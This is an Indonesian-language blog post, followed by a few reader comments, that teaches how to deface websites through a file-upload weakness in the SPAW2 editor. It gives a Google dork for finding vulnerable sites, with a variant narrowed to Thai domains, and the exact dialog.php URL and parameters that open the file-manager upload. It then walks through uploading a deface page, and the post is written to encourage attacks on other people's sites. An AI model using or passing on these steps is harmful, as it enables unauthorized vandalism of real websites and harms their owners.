Halo selamat pagi sobat.
Kali ini Saya Nuenomaru akan menjelaskan dan mempraktekan Tutorial Deface Website Melalui Spaw Uploads Vulnerability.
Langsung aja yo:
1. Dork:
inurl:”spaw2/uploads/files/”
Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p
Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. jadi begini: inurl:”spaw2/uploads/files/” site:th
2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :
http://contoh.com/spaw2/uploads/files/
3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :http://contoh.com/spaw2/uploads/files/
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi seperti ini
http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
Jika sudah Klik Upload.
Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.
Tinggal Klik File sobat ~> Nanti akan muncul semacam info file ~> lalu Klik Download file ~> nanti akan muncul halaman Deface sobat
Done :p
Sekian tutorial sederhana untuk hari ini dari saya >.<
Mohon maaf bila ada salah kata / teknis ;)
Semoga bermanfaat.
#Happy Deface gan :v
./Nuenomaru
Nuenomaru just an illusion in Cyber World
Visit and follow :
BBM : C0018D1A2
3 comments
kurang jlas gan ...bikinin video nya aja gan
itu malahan dah jelas bgt om, akwkawk.
di youtube juga dah banyak kok akwkwak.
#Nuenomaru
kok saya fail ya, saya upload dengan ekstensi html loh
EmoticonEmoticon